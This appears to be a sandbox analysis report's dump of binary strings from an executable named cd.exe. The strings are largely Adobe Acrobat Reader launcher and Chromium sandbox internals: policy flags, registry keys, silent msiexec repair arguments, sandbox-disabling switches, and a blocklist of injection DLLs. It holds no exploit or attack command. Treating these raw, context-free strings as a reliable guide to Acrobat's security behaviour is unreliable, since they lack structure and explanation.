DLLhttps://helpx.adobe.com/acrobat/kb/acrobat-failed-load-core-dll.htmlopen\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\AcroWinMainSandboxAcroviewR21\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\unordered_map/set too longinvalid hash bucket count
              Source: cd.exeBinary string: ONtCreateFile: STATUS_ACCESS_DENIEDD:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\filesystem_dispatcher.ccreal path: NtOpenFile: STATUS_ACCESS_DENIEDNtQueryAttributesFile: STATUS_ACCESS_DENIEDNtQueryFullAttributesFile: STATUS_ACCESS_DENIEDNtSetInformationFile: STATUS_ACCESS_DENIED\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\kernel32.dll
              Source: cd.exeBinary string: 4`@dI0nI 7H\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\CONTENTSCONTENTSAcrobat DocumentPDFCONTENTSLink Source DescriptorLink Source DescriptorObject DescriptorObject DescriptorEmbed SourceEmbed SourceLink SourceLink SourceEmbedded ObjectEmbedded ObjectCustom Link SourceCustom Link SourceObjectLinkObjectLinkCF_BITMAPCF_ENHMETAFILECF_METAFILEPICTCF_DIBNotesDocInfoNotesDocInfoNoteshNoteNoteshNoteLink Source DescriptorObject DescriptorEmbedded ObjectEmbed SourceCustom Link SourceLink SourceObjectLinkNotesDocInfoNoteshNoteAcroCEF\RdrCEF.exeAcroCEF\AcroCEF.exeRdrCEF.exeAcroCEF.exeatlTraceGeneralatlTraceCOMatlTraceQIatlTraceRegistraratlTraceRefcountatlTraceWindowingatlTraceControlsatlTraceHostingatlTraceDBClientatlTraceDBProvideratlTraceSnapinatlTraceNotImplatlTraceAllocationatlTraceExceptionatlTraceTimeatlTraceCacheatlTraceStencilatlTraceStringatlTraceMapatlTraceUtilatlTraceSecurityatlTraceSyncatlTraceISAPISMDBValForceRemoveNoRemoveDeleteAppIDCLSIDComponent CategoriesFileTypeInterfaceHardwareMimeSAMSECURITYSYSTEMSoftwareTypeLib
              Source: cd.exeBinary string: zl`l@`l@aFPDFMOutlook.PDFMOutlookSubjectEntryID\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\
              Source: cd.exeBinary string: \"}{\LogTransport2.exeLogTransport2.exeNOVALUE\verclsid.exeverclsid.exe/S/C/I/XIMEPADSV.EXEEmbeddingimjpuex.exeimjpdct.exeifSharedPathModulePathSOFTWARE\Microsoft\IMEJPSOFTWARE\Microsoft\IMEJP\%s\directories\ime\shared\acrotray.exe/Q\acrodist.exe--UseSystemFonts--EditSecurity-C:7--HWND:-J/E/N/P/J/O.pdf.psupdatepvbpreferencepersistmachineiddontsendcreatedumpsendlogsolutionurlopenadobetermsandconditionsopensolutionurldummy\CRWindowsClientService.exeSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Photoshop.exeSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Illustrator.execImageEditorcObjectEditorSOFTWARE\Classes\Applications\mspaint.exe\shell\edit\commandbEnableEditUsingacrobat_sbxSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\notepad++.execJSEditorSOFTWARE\Classes\Applications\notepad.exe\shell\edit\commandD:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\process_thread_dispatcher.ccexe name: \??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\ntdll.dll
              Source: cd.exeBinary string: AcroCEF\AcroCEF.exeAcroCEF.exeHKEY_PERFORMANCE_TEXTHKEY_PERFORMANCE_NLSTEXT\Device\HarddiskVolumepipe\\\\\?\UNC\\Device\Mup\\Device\LanmanRedirector\\Device\WebDavRedirector\\Device\WinDfs\\Device\NetWareRedirector\\Device\nwrdr\4202392~NtQueryObjectRtlNtStatusToDosErrorRtlCompareUnicodeString\Device\WinDFSA:CdmRedirectorVolume\Device\HarddiskVolumeDirectoryFileEventSectionKey<>:"\|?*Software\Policies\Adobe\Adobe Acrobat\DC\FeatureLockDownbEnableSameObjectCheckbSupportRDSUPDSYSTEM\CurrentControlSet\Control\Terminal Server\ClusterSettingsUvhdEnabledbFilePathPreprocessingShortcutEnabled
              Source: cd.exeBinary string: {l`l@`l@aF\??\\Device\x
              Source: cd.exeBinary string: |l`l@`l@aFatlTraceGeneralatlTraceCOMatlTraceQI\??\atlTraceRegistrar\Device\\\?\UNC\atlTraceRefcount\??\UNC\/?/UNC/\?\UNC\atlTraceWindowing\??\pipe\\??\mailslot\\\?\atlTraceControls\\.\\\atlTraceHostingatlTraceDBClientatlTraceDBProvideratlTraceSnapinatlTraceNotImplatlTraceAllocationatlTraceExceptionatlTraceTimeatlTraceCacheatlTraceStencilatlTraceStringatlTraceMapatlTraceUtilatlTraceSecurityatlTraceSyncatlTraceISAPI%d.%u.%d/cr/bbEnforceReadRestrictionsSOFTWARE\Policies\Adobe\Adobe Acrobat\DC\FeatureLockdownbEnableAlternateLaunchDesktopSOFTWARE\Policies\Adobe\Adobe Acrobat\DC\FeatureLockdownbEnableAlternateTempDirectorySoftware\Adobe\Adobe Acrobat\DC\PrivilegedSoftware\Adobe\Adobe Acrobat\DC\PrivilegedbEnableHeapMitigationsbEnableProcessIntegrityMitigationsbEnableEnhancedPolicyRestrictionsbEnableGlobalAtomRestrictionsbPreventCreatingExecutablesbEnableBinaryPlantingProtectionbDisableMultiplePrefetchiPMAppContainerStateSoftware\Adobe\Adobe Acrobat\DC\AVGeneraliSandboxExitCodeSoftware\Adobe\Adobe Acrobat\DC\AVGeneral\cSandboxLaunchFailureiOptionSelectediLastErrorValueiIsBrowserLaunchiIsCaptiveReaderLaunchiSandboxResultCodeiIsProtectedViewbIPMEnabledAppContainerpdfshell_prevbEnableStrictHandleCheckProtectionbEnableNonsystemFontRestrictionsbPVAppContainerFallback0x%XbEnableRemoteDllLoadRestrictionsbPMAppContainerFallbackiNumSessionsbEnableLowLabelDllLoadRestrictionsSoftware\Adobe\Adobe Acrobat\DC\AVGeneraliNumSessionsSoftware\Adobe\Adobe Acrobat\DC\AVGeneral\cSandboxLaunchFailure/if.Software\Adobe\Adobe Acrobat\DC\PrivilegedbEnableProtectedModeAppContainer/CRCoInitializeSecurity() failed, result=0xSOFTWARE\Policies\Adobe\Adobe Acrobat\DC\FeatureLockdown/if/mspiPMAppContainerLaunchFailureFallbackSandbox Process Initialization Failed - error:/CRDebugbEnableProtectedViewAppContainer/ICSbEnableProtectedModeAppContainerbIPMTurnedPMONbPMSandboxFallbackbProtectedModeFailed to create a security descriptor4057363MbAllowFallbackForAdminEnforcedSandbox/b/l/ifDbEnableAppContainerForDebuggingbEnableProtectedModeAppContainer/idBSoftware\Adobe\Adobe Acrobat\DC\PrivilegedbProtectedModeHandshake with Sandbox Process FailedD:\B\T\Acrobat\Viewer\win\EXEs\ViewerExe\ChromeSandboxLaunch.cppbProtectedMode/CRNoRemoveD:\B\T\Acrobat\Viewer\win\EXEs\ViewerExe\ChromeSandboxLaunch.cppbProtectedMode/CRInvalid DateTimeSoftware\Adobe\Adobe Acrobat\DC\PrivilegedSoftware\Adobe\Adobe Acrobat\DC\PrivilegedSoftware\Adobe\Adobe Acrobat\DC\PrivilegediPVAppContainerLaunchFailureFallbackReleaseInvalid DateTimeSpanbEnableProtectedViewAppContainer/CR:bEnableProtectedViewWin32kLockdownD:\B\T\Acrobat\Viewer\win\EXEs\ViewerExe\ChromeSandboxLaunch.cppMakeScopedAbsoluteSd() failedAcrobatAppIDD:\B\T\Acrobat\Viewer\win\EXEs\ViewerExe\ChromeSandboxLaunch.cpp/bAcroCEF\AcroCEF.exeCLSIDD:\B\T\Acrobat\Viewer\win\EXEs\ViewerExe\ChromeSandboxLaunch.cppUnknown process type/r/VAcroCEF\RdrCEF.exeRdrCEF.exeAcroCEF.exe
              Source: cd.exeBinary string: O\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\ntdll.dllkernel32.dll
              Source: cd.exeBinary string: cadialhk.dllacpiz.dllactivedetect32.dllactivedetect64.dllairfoilinject3.dllakinsofthook32.dllassistant_x64.dllatcuf64.dllavcuf64.dllavgrsstx.dllbabylonchromepi.dllbtkeyind.dllcmcsyshk.dllcmsetac.dllcooliris.dllcplushook.dlldockshellhook.dlleasyhook32.dlleasyhook64.dllesspd.dllgoogledesktopnetwork3.dllfwhook.dllguard64.dllhookprocesscreation.dllhookterminateapis.dllhookprintapis.dllimon.dllicatcdll.dllicdcnl.dllioloHL.dllkloehk.dlllawenforcer.dlllibdivx.dlllvprcinj01.dllmadchook.dllmdnsnsp.dllmoonsysh.dllmpk.dlln64hooks.dllnpdivx32.dllnpggNT.desnpggNT.dllnphooks.dlloawatch.dllpastali32.dllpavhook.dllpavlsphook.dllpavshook.dllpavshookwow.dllpctavhook.dllpctgmhk.dllpicrmi32.dllpicrmi64.dllprntrack.dllprochook.dllprotector.dllradhslib.dllradprlib.dllrapportnikko.dllrlhook.dllrooksdol.dllrndlpepperbrowserrecordhelper.dllrpchromebrowserrecordhelper.dllr3hook.dllsahook.dllsbrige.dllsc2hook.dllsdhook32.dllsguard.dllsmum32.dllsmumhook.dllssldivx.dllsyncor11.dllsystools.dlltfwah.dllwblind.dllwbhelp.dllwindowsapihookdll32.dllwindowsapihookdll64.dllwinstylerthemehelper.dllD:\B\T\Imports\Open\Chrome\Chrome\src\services\service_manager\sandbox\win\sandbox_win.ccCreateAppContainerProfileSandbox container for Acrobat Reader Protected ModeAdobe Acrobat Reader DC Protected ModeAdobe.AcrobatReaderDC.ProtectedMode|bLTEnableConcurrencyInBrokerInit01DWSPY36.dll:1|CwComijt.dll:1|cscore.dll:1|vozokopot.dll:1|DreyeiMHook.dll:1|Dev2Dl32.dll:1|Nsccor01.dll:1|nsccor03.dll:1|DSTermPr.dll:1|jesterrun0.dll:1|DreyelMhook.dll:1|druver.dll:1|vpnlsp_x32.dll:1|msnhook.dll:1|hooker.dll:1|pcsw.dll:1|AntiExploitCore.dll:1|netchatidle.dll:1tDllLoadPermtDllLoadPerm_Computeonly4220220S-1-15-2-3805855342-111495108-2588610986-3809954156-747251120-2599371852-2534338891policy error:acrobat.dll\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\RtlInitUnicodeStringntdll.dll\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\
              Source: cd.exeBinary string: NUnknownDefaultNtCreateFileNtOpenFileNtQueryAttributesFileNtQueryFullAttributesFileCreateNamedPipeWNtOpenThreadNtOpenProcessNtOpenProcessTokenNtOpenProcessTokenExCreateProcessWNtCreateKeyNtOpenKeyCreateThreadNtCreateSectioncompute-only-brokercompute-only-rendereripc-co-channelipc-rdr-channeltyperenderershell-broker-channelipc-cef-channellocaleservice-sandbox-typenonenone_and_elevatednetworkppapiutilitycdmprint_compositoraudiosharing_servicespeech_recognitionvideo_capturepdf_conversionproxy_resolverxr_compositingallow-no-sandbox-joballow-sandbox-debuggingdisable-gpu-sandboxdisable-namespace-sandboxdisable-seccomp-filter-sandboxdisable-setuid-sandboxdisable-win32k-lockdownenable-audio-service-sandboxgpu-sandbox-allow-sysv-shmgpu-sandbox-failures-fatalno-sandboxallow-third-party-modulesadd-gpu-appcontainer-capsno-sandbox-and-elevatedadd-xr-appcontainer-capsgpu-processnacl-brokernacl-loaderppapi-brokerppapiutilityservicezygotentdll.dll\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\@
              Source: cd.exeBinary string: A\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\ControlH1`@dI0nIPdI\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\SystemTopicsSysItemsSystemFormatsCF_TEXTStatusReadyHelpYou are connected to Adobe Acrobat.ReturnMessage 2`@dI0nI 7Hp2`
              Source: cd.exeBinary string: GCreateEvent: STATUS_ACCESS_DENIEDD:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\sync_dispatcher.ccOpenEvent: STATUS_ACCESS_DENIEDConsider modifying policy using these policy rules: EVENTS_ALLOW_ANY\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\
              Source: cd.exeBinary string: H\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\IsWow64Process2SetDefaultDllDirectoriesSetProcessMitigationPolicy\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\NtSetInformationProcesssecurity descriptor - error:D:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\target_process.ccCreateProcessAsUserW failed to create sandbox process - error:job object - error:set thread token - error:g_shared_sectiong_shared_IPC_sizeg_shared_policy_size\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\ F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F] F]#B
              Source: cd.exeBinary string: >`\Device\FileInfo%s%s%c:Superfetchinfo: %x Data: %x
              Source: cd.exeBinary string: 3`@gI84`pfI\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\
              Source: cd.exeBinary string: cCZECSYGREELLSUOFINPOLPLKRUMROMTURTRKMNGMONESPESN\Locale\\brdlang32.Software\Adobe\Adobe Acrobat\DC\Language\current\brdlang32SYSTEM\CurrentControlSet\Control\FileSystemLongPathsEnabled\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\`
              Source: cd.exeBinary string: cnullbooleanintegerdoublestringbinarydictionarylist\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\
              Source: cd.exeBinary string: :Zone.Identifierfeatmonitorapp.exeIPTip_Main_WindowSoftware\Classes\CLSID\{054AAE20-4BEA-4347-8A35-64A533254A9D}\LocalServer32%CommonProgramFiles%CommonProgramW6432Software\Adobe\Adobe Acrobat\DC\AVGeneralbProtectedModebHasAcrobatConsentDCSoftware\Adobe\Acrobat Reader\DC\PrivilegedContinuous.lnk\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\SeChangeNotifyPrivilegeS:(ML;;;;;)S-1-16-16384S-1-16-12288S-1-16-8192S-1-16-6144S-1-16-4096S-1-16-2048S-1-16-0NtCreateLowBoxToken\Sessions\%d\AppContainerNamedObjects\%lsNtCreateDirectoryObject\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\ F] F] F] F] F] F] F] F] F] F] F] F] F] F] F]0
              Source: cd.exeBinary string: IDocOpenDocPrintFilePrintFilePrintExFilePrintSilentFilePrintSilentExFilePrintToFilePrintToExFileTrustedPrintToExFileTrustedPrintSilentExFileTrustedPrintExFileOpenUntitledFileOpenFileOpenExFileOpenMinimizedFileTrustedOpenMinimizedFileTrustedOpenExFileOpenWithParamsFileTrustedOpenWithParamsDocOpenDocPrintFilePrintFilePrintExFilePrintSilentFilePrintSilentExFilePrintToFilePrintToExFileTrustedPrintToExFileTrustedPrintSilentExFileTrustedPrintExFileOpenUntitledFileOpenFileOpenExFileOpenMinimizedFileTrustedOpenMinimizedFileTrustedOpenExFileOpenWithParamsFileTrustedOpenWithParamsHandleAcroURLAcroCEF\RdrCEF.exeAcroCEF\AcroCEF.exeRdrCEF.exeAcroCEF.exe\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\list too longatlTraceGeneralatlTraceCOMatlTraceQIatlTraceRegistrar_pptExport.emfatlTraceRefcountatlTraceWindowingatlTraceControlsatlTraceHostingatlTraceDBClientatlTraceDBProvideratlTraceSnapinatlTraceNotImplatlTraceAllocationatlTraceException.tmp.pdfatlTraceTimeatlTraceCacheatlTraceStencilatlTraceStringatlTraceMapatlTraceUtilatlTraceSecurityatlTraceSyncatlTraceISAPICount
              Source: cd.exeBinary string: Software\Microsoft\Windows\CurrentVersion\Policies\SystemEnableLUA/RegisterFileTypesOwnership /PRODUCT:Reader /VERSION:12.0 /FixPDF 3305580Click on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#32770Click on 'Change' to select default PDF handler#32770/\ADelRCP.exeClick on 'Change' to select default PDF handler.pdfpropertiesShowAppPickerForPDF.exeProgram ManagerPROGMANClick on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#32770Click on 'Change' to select default PDF handler#32770Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoiceSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoiceSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdfApplication{A6EADE66-0000-0000-484E-7E8A45000000}SOFTWARE\Adobe\Acrobat Reader\{AC76BA86-0000-0000-7761-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Adobe Acrobat\{AC76BA86-0000-0000-7760-7E8A45000000}{AC76BA86-0000-0000-BA7E-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\VersionMajorVersionMinor12VersionStringInstalledProductNameAdobe AcrobatreaderSOFTWARE\Wow6432Node\Adobe\Acrobat Reader\SOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\SOFTWARE\Adobe\Adobe Acrobat\.0\InstallerPATHVersionMajorVersionMinor1207760-BA7E-7AD7-VersionStringInstalledProductNameAdobe AcrobatreaderSOFTWARE\Wow6432Node\Adobe\Acrobat Reader\SOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\SOFTWARE\Adobe\Adobe Acrobat\.0DC\InstallerENU_GUIDPATHInstallLocationAcroExch.Document.DC.pdfTrunk{AC76BA86-0000-0000-7760-7E8A45000000}BetaDCVersionMajorSOFTWARE\Google\Chrome\SOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkajSOFTWARE\Google\Chrome\NativeMessagingHosts\com.adobe.acrobat.chrome_webcapturehttps://clients2.google.com/service/update2/crxupdate_urlBrowser\WCChromeExtn\manifest.jsonAcrobat.Document.SOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkajAcrobat.Document.11.pdfSOFTWARE\Google\Chrome\NativeMessagingHosts\.com.adobe.acrobat.chrome_webcaptureSOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkaj{AC76BA86-0000-0000-7760-7E8A45000000}VersionMajorLowerCoExVersionSOFTWARE\Adobe\Adobe Acrobat\DC\InstallerCoExRepairDone\NotificationAppxSOFTWARE\Adobe\Acrobat Reader\\DC\SOFTWARE\Adobe\Acrobat Reader\\DC\Installer\AppVersionAppVersionINSTALLUWPAPP=1 REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 /qn/i msiexec.exe ADD_ALL_DICT=1 REINSTALL=AdobeCommonLinguistics SKIP_WEBRCS_REINSTALL=1 SKIP_CEF_KILL=1 /qn/i msiexec.exeAppDoNotTakePDFOwnershipAtLaunchAppDoNotTakePDFOwnershipAtLaunchWin10DisableOwnershipPrompt.pdf.pdfxml.acrobatsecuritysettings.fdf.xfdf.xdp.pdx.api.secstoreAdobe Reader XIRtlGetVersionntdll.dll\??\UNC\\\\\?\UNC\\Device\Mup\\Device\LanmanRedirector\\Device\WebDavRedirector\\Device\WinDfs\\Device\NetWareRedirector\\Device\nwrd
              Source: cd.exeBinary string: Gbad array new lengthmap/set too longstring too longVersionMajor{AC76BA86-0000-0000-7760-7E8A45000000}InstallLocationAcrobat\Acrobat.exeiEntitlementLevelbLoginStatusTrunkBetaDC\AVEntitlementSOFTWARE\Adobe\Adobe Acrobat\{AC76BA86-0000-0000-7760-7E8A45000000}VersionMajorVersionMinorInstallLocationAcrobat\Acrobat.exe#32770Learn MoreOkMsgBoxHookMsgBoxHookMsgBoxHookMsgBoxHook0x%XS:(ML;;NW;;;LW)rdrCEF_alternate_desktop_alr_alternate_desktop_rdrCEF_alternate_desktop_alr_alternate_desktop_\S-1-16-4096S:(ML;CIOI;NW;;;LW)TMP=TMP=TEMP=TEMP=LOCALAPPDATA=LOCALAPPDATA===invalid string positionvector too longSOFTWARE\Adobe\Adobe Acrobat\DC\Installer\bIsSingleClientAppbIsSCAcroAppInstalledSCAPackageLevelIsAcrInstalledInRdrModeSeShutdownPrivilegekernel32.dllGetNamedPipeServerProcessIdGetNamedPipeClientProcessIdS:(ML;;NW;;;LW)D:P(D;;GA;;;NU)(D;;GA;;;AN)(A;;GA;;;)(A;;GA;;;AC)\\.\pipe\AIPC_SRV\\\.\pipe\AIPC_CLI\Global\IEACROBATSTARTIPCNAMEDPIPECOMGlobal\ARM Update MutexGlobal\Acro Update MutexC:\thsnYaVieBodaTsnIorcAeBoda\\.\pipe\32B6B37A-4A7D-4e00-95F2-6F0BF3DE3E00SOFTWARE\Policies\Adobe\Acrobat Reader\DC\FeatureLockDownbEnableEventViewerLoggingSoftware\Adobe\Acrobat Reader\DC\PrivilegedbEnableEventViewerLoggingAdobe ReaderDocOpenDocPrintFilePrintFilePrintExFilePrintSilentFilePrintSilentExFilePrintToFilePrintToExFileTrustedPrintToExFileTrustedPrintSilentExFileTrustedPrintExFileOpenUntitledFileOpenFileOpenExFileOpenMinimizedFileTrustedOpenMinimizedFileTrustedOpenExFileOpenWithParamsFileTrustedOpenWithParamsDocOpenDocPrintFilePrintFilePrintExFilePrintSilentFilePrintSilentExFilePrintToFilePrintToExFileTrustedPrintToExFileTrustedPrintSilentExFileTrustedPrintExFileOpenUntitledFileOpenFileOpenExFileOpenMinimizedFileTrustedOpenMinimizedFileTrustedOpenExFileOpenWithParamsFileTrustedOpenWithParamsHandleAcroURLAcroCEF\RdrCEF.exeAcroCEF\AcroCEF.exeRdrCEF.exeAcroCEF.exe\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\list too long4057363broker_pdfshell_sh/if/id %uAcroCEF\RdrCEF.exeAcroCEF\AcroCEF.exeRdrCEF.exeAcroCEF.exe\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\Software\Adobe\Acrobat Reader\DC\FeatureStateSoftware\Adobe\Adobe Acrobat\DC\FeatureStateatlTraceGeneralatlTraceCOMatlTraceQIatlTraceRegistraratlTraceRefcountatlTraceWindowingatlTraceControlsatlTraceHostingatlTraceDBClient\??\\Device\atlTraceDBProvider\\?\UNC\\??\UNC\/?/UNC/atlTraceSnapin\?\UNC\\??\pipe\\??\mailslot\atlTraceNotImpl\\?\\\.\\\atlTraceAllocationatlTraceExceptionatlTraceTimeatlTraceCacheatlTraceStencilatlTraceStringatlTraceMapatlTraceUtilatlTraceSecurityatlTraceSyncatlTraceISAPIAcroCEF\RdrCEF.exeAcroCEF\AcroCEF.exeRdrCEF.exeAcroCEF.exeSMDBValForceRemoveNoRemoveDeleteAppIDCLSIDComponent CategoriesFileTypeInterfaceHardwareMimeSAMSECURITYSYSTEMSoftwareTypeLib%d.%u.%d/cr/bSOFTWARE\Policies\Adobe\Adobe Acrobat\DC\FeatureLockdownbEnforceReadRestrictionsSOFTWARE\Policies\Adobe\Acrobat Reader\DC\FeatureLockdownbEnableAlternateLaunchDesktopSoftware\Adobe\Adobe
              Source: cd.exeBinary string: Software\Microsoft\Windows\CurrentVersion\Policies\SystemEnableLUA/RegisterFileTypesOwnership /PRODUCT:Acrobat /VERSION:12.0 /FixPDF 3305580Click on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#32770Click on 'Change' to select default PDF handler#32770/\ADelRCP.exeClick on 'Change' to select default PDF handler.pdfpropertiesShowAppPickerForPDF.exeProgram ManagerPROGMANClick on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#32770Click on 'Change' to select default PDF handler#32770Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoiceSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoiceSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdfApplicationSOFTWARE\Adobe\Adobe Acrobat\{A6EADE66-0000-0000-484E-7E8A45000000}SOFTWARE\Adobe\Acrobat Reader\{AC76BA86-0000-0000-7761-7E8A45000000}{AC76BA86-0000-0000-7760-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Adobe Acrobat\{AC76BA86-0000-0000-BA7E-7E8A45000000}VersionMajorVersionMinor12VersionStringInstalledProductNameAdobe AcrobatreaderSOFTWARE\Adobe\Adobe Acrobat\SOFTWARE\Wow6432Node\Adobe\Acrobat Reader\SOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\.0\InstallerPATHVersionMajorVersionMinor1207760-BA7E-7AD7-VersionStringInstalledProductNameAdobe AcrobatreaderSOFTWARE\Adobe\Adobe Acrobat\SOFTWARE\Wow6432Node\Adobe\Acrobat Reader\SOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\.0DC\InstallerENU_GUIDPATHInstallLocationAcrobat.Document.DC.pdfTrunk{AC76BA86-0000-0000-7760-7E8A45000000}BetaDCVersionMajorSOFTWARE\Google\Chrome\SOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkajSOFTWARE\Google\Chrome\NativeMessagingHosts\com.adobe.acrobat.chrome_webcapturehttps://clients2.google.com/service/update2/crxupdate_urlBrowser\WCChromeExtn\manifest.jsonAcrobat.Document.SOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkajAcrobat.Document.11.pdfSOFTWARE\Google\Chrome\NativeMessagingHosts\.com.adobe.acrobat.chrome_webcaptureSOFTWARE\Google\Chrome\Extensions\efaidnbmnnnibpcajpcglclefindmkaj{AC76BA86-0000-0000-7760-7E8A45000000}VersionMajorLowerCoExVersionSOFTWARE\Adobe\Adobe Acrobat\DC\InstallerCoExRepairDone\RDCNotificationAppx\ADCNotificationAppx\NotificationAppxSOFTWARE\Adobe\Adobe Acrobat\\DC\SOFTWARE\Adobe\Adobe Acrobat\\DC\Installer\AppVersionAppVersionINSTALLUWPAPP=1 REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 IS_COEX_REPAIR=1 /qn/i msiexec.exe/i AppDoNotTakePDFOwnershipAtLaunch ADD_ALL_DICT=1 REINSTALL=AdobeCommonLinguistics SKIP_WEBRCS_REINSTALL=1 SKIP_CEF_KILL=1 /qnmsiexec.exeAppDoNotTakePDFOwnershipAtLaunchWin10DisableOwnershipPrompt.pdf.pdfxml.acrobatsecuritysettings.fdf.xfdf.xdp.pdx.api.secstore.sequ.rmf.bpdxAdobe Acrobat XI ProRtlGetVersionntdll.dll\??\UNC\\\\\?\UNC\\Device\Mup\\Device\LanmanRedirector\\Dev
              Source: cd.exeBinary string: O 3Eg_interceptionsNtMapViewOfSectionNtUnmapViewOfSectiong_originals\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\\??\\Device\\\?\UNC\\??\UNC\/?/UNC/\?\UNC\\??\pipe\\??\mailslot\\\?\\\.\\\Invalid Object foundD:\B\T\Imports\Open\Chrome\Chrome\src\sandbox\win\src\filesystem_policy.ccrequested path: actual path: Unexpected handle for path: Unexpected handle\/?/?\?:?:\\/?/?\UNC\Failed to process path (recursion detected): error code:Failed to process path:Unexpected error in path processing of:Unexpected error in source path processing of:::$DATA:$I30:$INDEX_ALLOCATION::$INDEX_ALLOCATION\\.\pipe\\\.\mailslot\Invalid path: 